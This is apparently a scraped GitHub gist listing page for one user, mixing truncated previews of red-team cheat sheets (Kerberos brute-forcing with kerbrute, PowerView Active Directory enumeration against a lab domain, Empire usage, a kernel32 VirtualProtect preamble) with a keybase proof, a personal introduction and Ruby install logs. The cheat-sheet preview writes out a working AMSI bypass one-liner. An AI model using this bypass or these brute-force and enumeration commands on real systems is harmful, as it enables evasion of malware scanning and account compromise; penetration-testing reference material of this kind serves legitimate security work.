With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Rey Bango reybango
reybango
/ kerberos_attacks_cheatsheet.md
Created
March 5, 2024 04:10
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
reybango
/ gist:e3f979bb0ab4f93e5c60a9b6bc81849f
Created
September 8, 2021 20:51
Type Accelerator Alias
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $MethodDefinition = " | |
| [DllImport(`"kernel32`")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport(`"kernel32`")] | |
| public static extern IntPtr GetModuleHandle(string lpModuleName); | |
| [DllImport(`"kernel32`")] | |
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); |
reybango
/ PowerView-3.0-tricks.ps1
Created
April 9, 2021 01:06
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
reybango
/ Empire Cheat Sheet.txt
Created
February 18, 2021 03:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Import a script into teh legacy Empire CLI | |
| scriptimport ./data/module_source/situational_awareness/network/powerview.ps1 | |
| Then you can execute the commands with scriptcmd |
reybango
/ PowerShell Red Team Cheat Sheet.txt
Last active
August 15, 2022 23:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 | |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # AMSI Bypass (Matt Graeber) | |
| Normal Version | |
| ------------------------ | |
| [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
reybango
/ PowerView Cheatsheet.txt
Last active
February 18, 2021 01:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all user objects in the specific domain and only print the AD username | |
| get-netuser -domain throwback.local -domaincontroller 10.200.14.117 | select samaccountname | |
| # Get all computer objects in the specific domain | |
| get-netcomputer -domain throwback.local -domaincontroller 10.200.14.117 | |
| # Get all domain trusts | |
| Get-NetDomainTrust -domain throwback.local -domaincontroller 10.200.14.117 |
reybango
/ keybase.md
Created
May 24, 2017 14:23
I hereby claim:
- I am reybango on github.
- I am reybango (https://keybase.io/reybango) on keybase.
- I have a public key whose fingerprint is 3EB4 B311 8F42 7223 B9B0 EAB8 5E40 0313 D8F5 A86D
To claim this, I am signing this object:
Hey all, my name is Rey Bango. Note it's spelled with an "e" since it's short for Reinaldo. I always go with Rey since everyone has a hard time pronouncing my full name. :)
I'm a developer evangelist at Microsoft focused on web development and Internet Explorer. I've been developing professionally for about 24 years in a variety of systems both non-web & web-based. I cut my chops on the web using ColdFusion several years ago and then shifted to client-side development where I eventually became part of the jQuery project team.
My main interest in this course is to get back into server-side development using a modern stack so I can round out my skills again. And hopefully the client-side stuff will be a nice refresher for me.
I'm also the dad to 5 kids and have a loving wife. :)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reys-MacBook-Air:~ rey$ rvm install 1.9.3 | |
| Searching for binary rubies, this might take some time. | |
| No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392. | |
| Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies. | |
| Installing requirements for osx/10.8/x86_64, might require sudo password | |
| Skipping `brew update` make sure your formulas are up to date. | |
| Skipping update of certificates in '/usr/local/etc/openssl/cert.pem'. | |
| Installing Ruby from source to: /Users/rey/.rvm/rubies/ruby-1.9.3-p392, this may take a while depending on your cpu(s)... | |
| ruby-1.9.3-p392 - #downloading ruby-1.9.3-p392, this may take a while depending on your connection... | |
| ruby-1.9.3-p392 - #extracting ruby-1.9.3-p392 to /Users/rey/.rvm/src/ruby-1.9.3-p392 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reys-MacBook-Air:~ rey$ rvm install 1.9.3 --debug | |
| 1.9.3 - install | |
| Searching for binary rubies, this might take some time. | |
| Remote file does not exist https://rvm.io/binaries/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2 | |
| Remote file does not exist http://jruby.org.s3.amazonaws.com/downloads/ruby-1.9.3-p392.tar.bz2 | |
| Remote file does not exist http://binaries.rubini.us/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2 | |
| rvm_remote_server_url3 not found | |
| No remote file name found | |
| No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392. | |
| Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies. |
NewerOlder